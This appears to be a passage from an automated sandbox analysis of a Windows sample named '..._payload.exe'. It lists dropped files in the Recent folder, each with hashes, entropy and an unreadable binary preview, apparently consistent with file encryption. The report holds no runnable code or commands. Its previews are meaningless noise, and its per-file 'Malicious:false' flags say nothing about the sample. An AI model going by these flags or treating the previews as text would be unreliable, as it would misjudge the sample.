                                                                                                                          SHA-512:56A5C3F7E360F31EEE9788B2E14D37CD9E0A44C48ABC3D3E1B38FCA5E7C30E0F19BBB10152562ED6FC70A76A47DBCE81058F955270977F2F262D38B446CCEC57
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV!av.x2...U}....tU'_......~.*=.qH..S/..........(.......2a:j.{..6.......{.k..3..A...!.s...%f..=.b0...(}nj....#75.7.2...b.e\O..h....>..g..,.r..QU...O.0...Ei.W....&....X.......h./.M..G2.......6&.6.X{.H.q..3..E.E9q../..s.v.....e..E..5..].*..v.s.y~?..........c.6.w..|.$c...w..g....'..S,..].C}....1......@.]...&.JQ..z.o....v.Y....t.\.|.bd..U...q..T.(U...O...7.j..s=.W...Y...Co....{.6..y....F.F@,.{ CDh.4...x....P{qG..`....a.......3...onA....%6.0........J...C\..-R..{^;c}G..#.\..@uH.....7SRhp>....".!..x.....Q.tU!.j....D......5.....EZ.......}HD..7........cw9a,.)..Q(..w.+.j..!.0...C.\m...2.<S7f..?..U$....}...%Ct.r..e..eX=.Y.....4..4..k......3(....hxg.@.B>-..,R..:.....N8.Q......TaX$p..w._}...4.j..;...\."n...^..(...r..|.....V.4....K8......P.).M.v.d.Z.b\..?...&......K......>..i...J.........0(...Lc..p..G.9...pB{i.....y........8N...qb...5..lo&)Z.v..^\6.n".,{..\....DEB..o..wd.....d.'.9f|.$..zd....8.uk..tJ...`..S...>..*'..5O..2M....T..R|...y.D[....

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTAGVDFUIE.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842863417144909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:HxTs4xfc7CcSMHJuhJiMaR+Av4URWLqp7hDl7IRkQipUfE59PnbD:HxTBc7CcpWS+Ag67hCmhAE5tbD
                                                                                                                          MD5:6D2E50745642BD7FACFBE695D2EC86CC
                                                                                                                          SHA1:8A87C918F10E2E267D902F8139B9AAD0E93D488A
                                                                                                                          SHA-256:69432F01404A035B70A484F03361E526A0A2366E838A240A5C31DBA12C100673
                                                                                                                          SHA-512:947A6283EC64D04854C0D79B2F1A831F44AA58DDBAB52600ADD45CD7334190280474C1808475ECD14B4423FE43CD5AA127CB85C4FC4533AFA2F620B6F6E70A14
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVf.^!..g.....g......xh...z.*...)WG...\?6?~e.... ..G./..(c..).e.3...#.. Ms.....,xS..2...c.p8&j..8`7zz&+.]D..x.4. '...(..o...,5V..uG.....R..*{.{.g..k..\`.T.(v[..b.."..l..z.'o{.-..b/.S..D.x..S...G.qq.Eq?..>..?-K..#......a.j..{-X.u.]...q.!v...3.c.!=....7....Lz..tpt...~..8.Y.......(..........@..v....?.j.,..O7..%r..a....c..J..N..if...9.M..=%...E....s..s.b.g{K....z..u.Jd*..R.a.zt...X.+.......\.L.Z6...?.EX.:.X...#..K5K..Xv..~....H..T.....^..3vI.c..e..:.../I..9..;..]j.oY+.....VM......1..|.......m.X..MN.f.WA.$^..+.{.f..[T.L..>(oo.I.$d...Sa$".<....=.B...........h....>K~l..:.8.?...j...I..._.+...f....&..wE...7...^..oI!9......W.L..Q..s...3.5.]...[x....Z=..2V....iM..JN.2h.hQ2.....@..m._9.3..H.8$I7..../...{"SP.....I.K.{..!.D...^..B..<..<"m..xX.........0.U*.. .G......a"*.T.].....}...\...'..=.5...s.h....U(.....k...rD....U...yV^.....Bu0.$f.U......ky..->0._....G.F..?.)__......~E*Y..?(^~..Z...|......N.Lz.-.a..........'. .F.....d.A^z...kC.......u.&.o".......y

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IKCRSXYNJM.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.844561961686865
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:cML13qm5dXh3WC3kxXvsTnGBX8xWHWVG3wlDt/bD:ca13qelscaXUTGxKpGiD
                                                                                                                          MD5:764B709968C6E0B31160F738738C8A9A
                                                                                                                          SHA1:F6DB0238EADFAC69D56CA610EFFABDDEE995BF5E
                                                                                                                          SHA-256:EE7C8C154C01FC87304E2EDBD6523FE0078862070BCF9D61369A89F3B7EB4D56
                                                                                                                          SHA-512:0989DE198D3FD741CD07D894A918B14A5144E8270F7B4396C3BF742A0D91D5E4E0A27787EAF0CBEE7E1BDDE345F4F39BA9635097F828B9FD206EF1E3C55E9DBC
                                                                                                                          Malicious:false
                                                                                                                          Preview:IKCRS.E....l\..fI.h..~...S...mr.....h..>.=w...9..5..N.(..B.Yo..ET.x..g....`q~`~t<.....RIz..8.s..(k.N....?.yN..iA#.U........%....C..%....S.\y..c.0D.W.i...\..*T......G..<..}..Z..s...O..?.r.....Qer"..j....J....H..."G..[.r........Y.......Bj..^..+...["..W.w...U..e..*F.].<D....R.....[....6..ey"...c:t..m..*.~I....|..T...ut.\._.M.)..M..<j..Y...>..h.I../%.H...<..E.p.,.7........D.,.-.H.Y.q...6....).fF.,..-/d.y.bL.}.~.........4:...ae..c...e.."|.?....J..6:.v.p.&...y..u.>........=a.r+b....+[..xn}..l$...g.a.....hNP...i....h..6.R..}..i........H.v&i/..y..]..#.......]....G..E(..I..C....0x+sX...x.v.2g.?..v.}./..XF.?.v....g....nPWe..(AEB+.d...R.f0U....B]ph..tN.p...pu}.....VHgf.cY....We..m*.M.........!`......P.n.8.,]x..)...<.1#(s|y3`.....C.8...=y.9<...W.Av.2.]7Yc...q.,'.m...)HbU.%R..$.z.[C..[......;>...#..]..k....#.....".:..b....2Ex.J.....Y.=.^.E......p.gn_ b+.hR...|i.m..S'..w.L9}l..5.-..p.T..u.'...S.&.....:........3...'-D&z.W.5s.....B..{A.i..M8Hc.f...Qp..a=

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IPKGELNTQY.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863667601952109
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:V1TPf7KYjnLi5XqoedgQhAn2+mDOJ9Uskqk9I0GDdG/hRCg0WlGlhrCUdybD:VpO5XqHgQukaUAk9yRG/bCtuu/qD
                                                                                                                          MD5:DC6287C5E36AF21287C7306AE54243E7
                                                                                                                          SHA1:C9F5FAE501F128695FC11B4E874EFE364AD95D7A
                                                                                                                          SHA-256:CB9AB3387B84D48F23CE66CC37F75A59F5923C7E9B87E7DB545D610E3597549C
                                                                                                                          SHA-512:7E823B6976EB8FF16ED8579A44B067B7010DC6A3E44E8EB7A8C6A62F5C0B6F86AD666212352944D61A84C8FD47A15338C20159874A8A5246AC83720C6746005B
                                                                                                                          Malicious:false
                                                                                                                          Preview:IPKGE.'..b.=...=!\w..T.Sr...%.h.....'.....B..C....q%..8...k...:..>t$.=)....!.:G..}u.?..6Q$...........{a..Vr.....8....XDA..K..pp....Im....@......<.^.^..b.......N.'.G.j........{.`.R.%..M.yd.J.le..r..9........./..%...g..5....T.....z")A.ES.*.....~5...&h.f...Zb,....tk...|........".....<O...yu.H.q-......q..S..Q......BS.=[...X.,.HP......N.O.d'.......U..5rQ;..y.q...N......o...'.. E.S....|.Uo.Z....'.#.=9.p..o..lx...t.M...C...;.@..9..OF"x5...Z...k.{..b#......6(.+.......).x.b.Z"..B?....B...3..Qq^..E..}.2.*o...8.._o\.h..v0.\....pt.~....^../.{m1~A...Y..~..Ib.}Q...$..x.*........b....N..O`V%..&U..z7.....$....R...O].U1.>...T.1"6.oWEV.bI.SU.w......d[......q.;......z.1>..-......:.pm.x.j.1(..!Yn...u7...I7.A2nD...W.D...1.g..R....=.jJ...FR.. u...e....hv.?...~d.,l..i..#..~C:........A..~.q.+.H....0r.Xu.y.V...W.....{..E".T....D......]....7...g^.$^JZ..].S...w....l..;7...}A... .d...r.....q=.f<Y.../{=e..n...t.....u.....T{yDC8.>..BJ..zo.l-..}k.m.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IPKGELNTQY.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8553880300786725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:PBHmuydVSCkfWFx8fxPIsoVDsGZsWtffsQrj23zW0xTbLd+7aDNttGbD:PxTyd0fWFx8p/oVDsKsWZfhiCgTPd6a2
                                                                                                                          MD5:CB429B2A3A7F440142044929A5916E6C
                                                                                                                          SHA1:833D9837D992F4D96A477B0255C2D983654B3581
                                                                                                                          SHA-256:828FA15530EA13775D6D721C66F0AA1C6A39FACF080FA7C7E6ADF88ACCD4525D
                                                                                                                          SHA-512:7DD6A7A6AC9D77918AFF0F5084FF3EFD1DEC2F49DCC2C697223C85D3162579AAE67DE9E89B91B3DAAC2535837A79ACFAA27298F97510703F24D817103DF0622E
                                                                                                                          Malicious:false
                                                                                                                          Preview:IPKGE........N\.....l.$.M.p...WB:"z..0.,aZV.....6c..,.D...4].2..o.-.e...&.M.....c?9..#...s.Hh.?_[.9.,.R........6:.[.c...(...i9.{!.I..'...S.3.....{.m:.w..l..oI.z....>..v.....0m...T....2^n.._iXF........j...,.V.r.q.$6.\~0..L..7.r...?..J+.8.{.M}...g?.P.J.$.&.z.."..%#....L........w.Z$........9..pQ.j.....t.=...G;.v.u..#.{Z(.!.......;I.n..&2..k.d..!..$....s.F...En..%..Y)t``y.ss/.(.\..:UE....3...|.A.p.H. ...)W...E..cq./T...E/..~.Z...d...-.B.-^....."d2..)j.o..r.:.......6.w..7.......Y.......}.d...d."..c.H..Q..:..|q.a4......s{#.^~.TC.'C7..Z.E....-. .....c..Dq.9}.....kWFY..Tm.....l`..._<..Q...LD@f."5UOP..e.4..).....Y.U.j.....V...,.g..v..a..q..l*..0J&..sB.m&.........!..*..d%..N..]q...e...pX...".....l.Cj.....q!......*......3..}t?.(..;....p..7.bw'vr. ..Z......-..}M..P@W.D+.."..[..sLh.....P...2....R..0.IPe...o.i..(.c.8.....W...>..J...Qw..~.W9..G.c..A..|p....`G .c.......!]0.,..u.i.aMX.....z.$.......$..z..k*i.....x....&df....)...!1%....j.]...s~..7.......~.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KATAXZVCPS.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86572388095059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Y5jMFIxQzDySfdvb/UeBhLvz6c3G/GQdSvXhC19z9H6aXEsn3STlp1bD:YOFEQzDySfb/jv6GQdSvX4tNxXEpRD
                                                                                                                          MD5:0592872A1F2664B26D5D2A6885DABB69
                                                                                                                          SHA1:C0904D42F06D8A7DF5ABEE7DBEF91324B6465EC7
                                                                                                                          SHA-256:4B39158979D829089D0B56A4FC56ABE8AD16BAE264B0942EFED2F66BAE5D2F95
                                                                                                                          SHA-512:B2E6261A36E53F88B658E11C20A1D57FEC9BE1E0B8B9E6A265D503D7848E8DBEEAE6286AC63C68657D041F527CD84570A018E37BC84F09577BF44A360ED72418
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAX..HPx.m.....y.....#.._.c.....'GZsa6.`..2..7.:...*..d....$..h....-54..j`..~.C.....90.4yJJW\...h3.....J..}.:l.....k..............7...T.D;0,K.T3.....D.\F?J......:..-..I...h.W.+^......aT..b.t.GC;.s...-....F....m.vp.;........ :R.........q.<f.h..;M.=.......\....).3.j....l..g..4.x..E...j..........K.M.V?.P.>.0..f.=...d...S.@.....z......;..B.>......l0J0.%...Y4.o! .Wb!T.P./.#HT.k..69...3.H....N......!..".E...Y.....=......K....j...p...=.q....3|C..2.&Nh....7......F..L..J...b.}.."?.{.c8Y...OV^rM.'j.<........ .].W".n.6W..k.....1.@b....j\..'N...r..H.0........8...^...:...S...1?.b.)..*.t...+ .:.!....RKn..../T.......%...Vs.c6#..;&.y..=.}......S44....@.'.o.....78..D.........T/.nKn....D.i....qB.fV..3....\..A....*.5.I.v.....y.s...%Fd.b+.a.|M z.....h<....,...(.\zs..n.%...%)....AG.....=.er9(}......,G.e$.r2.{.D{..`.E.*M...Q`B[1..U,.VQ....L.N..1....#.>...Ox..5@.sr...S..u.........._q........y...H.....T..mQP54..y.H....D]....Wi.T.....).K...mT.)/S*i...K @F..B!p......

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KKCTUQOTUB.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.875153535374346
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1Mx4LyLFsNkLEAFqEfHgD3uGN1Xb7L4WycRdg1eeSwtPBzMQqB0bD:1VNkLEAFnPgDeuXbP8IdwOwPzfqeD
                                                                                                                          MD5:681ADF0ECFAC80003E2CDBE69D386A12
                                                                                                                          SHA1:AD80690FABA890362CA96EE6B2AFCA390A205BB9
                                                                                                                          SHA-256:2B41A4AAA3C646FFC2C56B70EF7839A43510414F0096E09C22B05937D798A1D5
                                                                                                                          SHA-512:6EFBE8C8A7BA10750061D927760FA1E62AD6F313B9DB6BA933C48F69C8569F02F0B522A1918CB4EE7E077D0AA054452E83C998D05BAB3FAED8D37C15903365AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:KKCTU...'mtS..9g...~g`.fhv.+..\M..AL.9V..c.!.:....*2.'.....E.....G..Rt.."W......B.p.<.W*..........y.s..036"{)Z....k.....%.N...J.........\[0....$_d{.....uoA...t...%...-|.%..,c?7.......Mg8...ro(d.j.}.......].#!.d.Z...c.>".:C...*...J.4.Q....|G...(..{O...?....,.....Klea..d.{i.ko). ..1...6.=C....?......,v.u.q.E^...-......r|...Kx7.aV:G.b@...*.x...5.......b....m]...r.CR.....~j.Ok.Te....{ .@....T.;lYOk.;...,.`*%n.Y..e..~.Qx&.?5...f .5:....a.".+c...5..*..(e..H6.N.K]8..Rx.....p...q..%o.)...X.M&..V..N.1G(...G.,.....{.qk..*.9...q...Q..q.({..l^....@J.q...._Z.W.{.&.W...., ..X.....B.s......b.R.....i.1...@.s../Rf..`K......&.s..n/y.S2aRnZy.I..Y..wa+y.....D./...*..........e.vB./...... L..[.U!.]...:u.h/#..+`.S...xoz.s.c..s.4U=[.?>..._.......np....S&....[/.ZW...3....<...z*@+>.N.<......7.3.o..9.<..HppjD...........L9...g..lS....h..i.o. ....a...g.....[..IUf..y..]. .:..O.*F..*.:.c2.......b'~a.F.A.F0.`,.I.JS0c.8)...|..z-'..(.......N..;..uMW.........(..?H..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849779392312825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1LlCFE37dJcCIlqO4fyZtlI4UU1xovcbWwUpU+RuDIb+b9HZxdmjbqbD:1xCFEXh2qX6LlFn2Ppn4U2zxkED
                                                                                                                          MD5:CBD6EB5C6FBEFD87FBAA622DFFAE302F
                                                                                                                          SHA1:4BFBB7D08DAAC67848F3871026DCFFA8F1B608D6
                                                                                                                          SHA-256:B3710FA61AE73EA7F74A3AA132FC2DE4AA58014925633615FB2EF5F1CEF167C9
                                                                                                                          SHA-512:ED8D6E532A3D1092EA8FD23AE24C6F18646AF2637A0DC4F33F90C41E603C3A6B9800DB64C24360D6F26F34F96B3A12C8C151D92FB3291BD11DB78A79DB045165
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN)...\S.Y...q.#.../....k...bK_,..$.n.v.g.u.%5.Ne..e.#H.s....#..v]b.....W..#Z..Y.r-..Hi.RX..W..yd.O...[......[...c.D.c....1b......c..*.....h....f.v.:..x b?..A.........EB...J.....^Dh........Q....k....iX..@.`!...q.c..[...J....]..j..|.B...cA .I..&.....@.|.P.?.:.$...}....V..TV.. <.o.g8.;...Wl.T.........f..M.9..J. a..1.w.$;oo..6.-.#b.."..s...&.5...0...P..........Q_.{.]..(.r...$........z.P./$.QO.L..].Y.b../.....K...N..w...&.E....}a.!M.$t36.Cfh^.._~L..~.w.D.B./...*.h^.i....[f>.x..).;...x..#.]W...g.3.....3R[.......9.E@S.../N.E.....D.ma7K..$!..v...R...q..}.....R....EgU<r*&....j...M'?......U.#.%.,..H..z.~#..H.e.y.{.t..y...v..?...!..3_..z.m..[I....V+{..x..bibl7..6M.&e.OFc.l.T...6..c.....F.a.&q.rG..0...]............C....=...:..y....pHa=......1.^..M..>N2....C~...4i.\...ZK.i[qrqs..$..bF...~.Q..-.>....I.M.yw./.~.]........N....k..|.t.......0.x}.<..r.}....n..)+.'.N...wu..w/............K.R.2D...4.......{.;.e...+.S.q.y...........a{..x.....5...,.O

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.882117641810439
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:CB4X7kiLTQF3DraWt4PAH7RBvRx3wOBRrCNAcHaJFSF5z4bkb+bD:CGkuMF3cAVBHJumIsbkb8D
                                                                                                                          MD5:CE26981EC83A71DBBCCB369A38ECA5BC
                                                                                                                          SHA1:5FE9FDB9DA54B05383C8EBED4599033B3E43AC02
                                                                                                                          SHA-256:A6226F4EFE376F5BAC84038DACBCB3D6DDFFC786B4719D05D60BBE418F84F1A4
                                                                                                                          SHA-512:D2F0540BAF5B34318FE6A350CD03C5C45BCFD753749F002D9182B97F70ECE94A682B8C6B9E6BC2035B757815019A833972E9AAFBEA3EE6C13CF317FE34CE447B
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN.v.......g..J.....?...`...rks..+:7.....@...^..D.F.p..~....&.H..;$).........)6n>6O.;..._.(.8d..b.s...in..m1?........m.%/\......NXX,...AX(......Ug...7*0@lY:..r.*."%.cH..."JsUHz...}.e<..........X.Y..8......@1v...9=.......z..2^$9v.(.O.I.....g#..T.<...z..E.gqc.%.N;*...#.7.J-.......+.2..(.E.8K.S{!...]S..&)...,.8.)......'..E....7g.......f.G.L..5......w...BE't&.E.....Z....v>..x.Pzl.i....Y..<f.p.w. ...?%.dE.e.,...!.....9...$n..k1.L.YT}..:.....ny.......u@n.B./zp...C.(..|1..../{...U..R..\T.*...*.D.*<..-H.......l....}y:.....G....|...t...__7O..yo......''K.q.&.@E..=..y.E.uhv....m..P.q..s.=..*..B.!T\.sUj.Xp.q..6.M...PU8j...M..."Oz.\.X.D.~.Z....>.!..!..O.a.....;?.9......`.{...ZOE..d!.z5.%..=...^.@v.....G....._v....o..*hg........g..7.O'..]....R....x._.^[..$..q...7'...=v:..s..`.....~..0.ngy.9.n......w.Mf....f/....o.oP...o...#.o...N[H....L.k...G......."8X....(z........9.y`..T.E...x....#..B.].....pG.#../ .....bW...n.V!.z..un...A.....3.....qw.a.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KZWFNRXYKI.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.830154758434434
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XYsbV/T9wL/Kqg6LXgQd5Sn53ry7aZMEsiFxKyMPM4tqXRfXbD:Xx25xNd5A3memE1xGPg1D
                                                                                                                          MD5:F7567084B174557765A82C06CB59C4CA
                                                                                                                          SHA1:B37A15559F097C594522BBA6EEE0F08C173A609D
                                                                                                                          SHA-256:F1139F27842BFF39AABBC5F80BC5264C72A627368B155B1CE9E885FBA23FDE60
                                                                                                                          SHA-512:B046892CAF91A3932544D7B3AE218951D24A13726D3596A79AA2C24BFFAC1A597B2179C4BAEA217387C14F4859887F2A4B0DF9E1CE2DD53DBC41231615DAE433
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN.h.....8..Y.^.D..Cw...3.E...n.;.TGj..<.V....n|.;.)xsaxt.1..8..n.$k>z0.m...GC.5.q....0..c.1.0n..f...m.Bt...G...25....U_.hM..>\^..:.N*d......L>9XA.M.v.!..$....%.... ....Gy........-\.!....6.=.h".$...Gx..b.9.\A:....(H.bb...........4...Bmj.%/...P.}......KC7.=C....1d<.Z.n.....Er......}.!.*.c&r..j..Ny....G.>t.9....s.~.Xd.........=..P....=...W.....H<. .,....\..{k.W...T..We...f...K..`.VS5....u.......+...D..............t....;.b-..L..9......$9W....e..[F[.....o.}.o..cW...1.>p.........w|. ....4w(B...C...?.7.(....[4udd..}.p.^g.f..\*..*...Hh5.V.....,Np....H-..%...yN..%.M..4..q...fCV..+..^.e....N..b|L.EbN.o./.A.@.....n.t.k&....5.......a......q.-....s..A<....A........gBi!.3..O...i.i{0.,.[......ON.s)>F..._4J..w..8....D..q.;FR....?h....E.T?..?.........BC&..n.Q...xr.f.....x....O.....Vk.....k6".Xo.K.>G./.-..|.2.O.....e..H.2......i3..<.,...1$...."....'.6.3.."cW..E.rn.'.*.[.Zh.XVT..(.2.....(!k.>.6s.8..x...C.kbf.W0.."i...jA...S9..L\.).....7...Y...U.p

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LTKMYBSEYZ.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856161452846947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:zYchZ64FsKOQ9sS/XlNi3BMZL2xDNDNRFg2RpKeBpMxxzHJQfifhC3zpD1LgbD:/rs839Ni3BMZEVFg2RpPBpwVY8hozppS
                                                                                                                          MD5:54D8B17B3D56749D44CD0A763B03EFE8
                                                                                                                          SHA1:14B36D7197230ABCD8FAED4C20560D1AE5BF8C67
                                                                                                                          SHA-256:EDB2A33D00B6F2966A61107DD842A617B915225277E0E951FB11F05A29672E89
                                                                                                                          SHA-512:4AE0B78105DDB6FFE90B12D86BB8A2ED6FA66A06AD87E84B9801BE17BA6CC9F0637C9AF4D7B3E5CF46835EFF3A013CD81E0DEE55007935BE746B6334E80C5467
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY..d.f.Q.....Tcm.S"....-..L&.C.(.8.L7k.Zg....7t.m..U....9.WC.3-.....3.......hL.D....`.|.2dC.F....T...V.........uQ\.[.m.......UQdI2m...e.Y...!..G&.....n.V.O`...,...j.sw}.....SV..WO...A....VM.R.=...y..aE...T:}.......{.`...3.+.....p.9.[8.d.z..BKX....7..X...{=.9.~...C=..)N..*M...H....?#V,rK.S.'m.O[S%8.F...$..*.+X..*.s..>.m...p...3.~..n'D.Pnw.W+.....l....,.Y.b\K....MF/..v&D.....U).v;_.$..?..K.z.k4.i.Ml.....W18..&.J...Z..Ia*\II.....l.(.i}......w$...t91..v...V.H....7..4Cd.Si.LJH.M_.Am..H*..N.s?.Af.........--\.....g..`R...+...f.7r.......if..6...eTz...e...!.i...s...u.x....w..g.....'.....{........r$......x.}.Q9`PL.6[..Li!3_.-..k...'..:(..}..1@........C.GV...@.0BNh..k\.....&.l.c<.."<...8.l7Z......x...u.Gb..f4/G.......*i....Y|..ng......5....2..y.U...>.....h....^.h.D.....i....[.t|#.).....)KV.ip..2.Bt.k....Q..h.7mT..S..:......p.7.....O..^........m.-.TwA...SPL{....Kk5=..,.....\.....d,B..z.:.-.b..djQ....M.Q.{.|t5q.e.V._.i.J......j.Y.i..z.Z...uW..H_.

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LTKMYBSEYZ.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.850526795784183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+Lu7pl4kn9P6QnWAwdBq9SLMZks9KuPU8oBxrAW5jSTbDYMrbD:H7pBXnQBq9yShM/rAWxSLtD
                                                                                                                          MD5:F8F20B94B5E77C2270D24EB81701E766
                                                                                                                          SHA1:75A54FA176CD92A438F3ABF251214CD53B962A04
                                                                                                                          SHA-256:AE3839FDC6F98840516A7220574C26786A7C568664BF796B7DE013B8B40DC4F3
                                                                                                                          SHA-512:B0FF69D5D71CF9DAA9D9D5EDA5C677EB7E6464C362340E84148F33F913393CB6461AD50AAD4C9D7D811ECB5650960344F1687FF17B1734EAA0A33589902E6F14
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY...5.$.....FY?.].P ...&...E...|03.x.........Un..,..`..z....F..Q*.@.%X9\{a....t+._..c/K=..iK....o.Z..J.M...s....LJ.uT.i... ;.\.........P..c......RAX=.....f.ba....h.a.L.........uB.*O.^h>.NQ...ZK...h.>..m.N...o....T...A.|6zZ..C.._.......S.6.V .Oc.@....d$m...6....u.....K...b6..@.Glf.hKT.........Z>(j.#.B..{..]..m...J.-.a..#.,.].j.....1&w.V..pkT.$......R.r.I..n".g..F`.CP.Fx.....Qn.f\.9}{.$...v.q.e).kd...y..8(g.Z.~........].. ..s...|mB8......m...0z..4..Z....umoiHi.l.$..q.S..-..._......6a.l!6.;....A..DB..C........`...@9g....e....Y;b...8"e.Y...T[.@....0iF...a.0O..q..>...~...n.f...G.&....1.mh..z.i.!.}....a...)...*...h......_..r..6nK.9.._........@...[..?a."k....V...-_.2D%.........j..cni.$9......`x.......o.......J.i......`. MM,^/.j...[.1^.]..Q.*.Xm.B=~...~.H.O..>..&.GM.O....%.."...(.RY....`@.T.5'.....S.!.=....Gr..A..N[....yCct/ x........V. %.0............DS&...K..4.a.a..?..`]..O..t$..X...Y..`2*.j[7.......Q..45o.....;.....{~..D.k.q...U........

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MVLAMAIDGQ.jpg

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839838615056011
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tLg8h5f53ZRYtIfnp7HjgDXIrDsk/+9F8KKfufxt0FAEf4cLfd/S8KHH0z4ORQXn:aALJRNpjvrDd/dQLdEfRLFrlzxiNUkD
                                                                                                                          MD5:7E4C3276CFBA23E992C0C7CB43FD13F3
                                                                                                                          SHA1:EA8BB86DF04D783D837CEDA15DB540B12F8230BA
                                                                                                                          SHA-256:E619454C3E5EE4792A646E95C09D0EFF347FF389015A06B90059C9C75FD8F248
                                                                                                                          SHA-512:38FD80AE78403515C305482DE6A59A2309159D8ABD2AC06ED44370AAF75B2258D6DEDFC5AEB619D78A108E790B6C17345D3CB90EBC35B101879494256E578ACC
                                                                                                                          Malicious:false
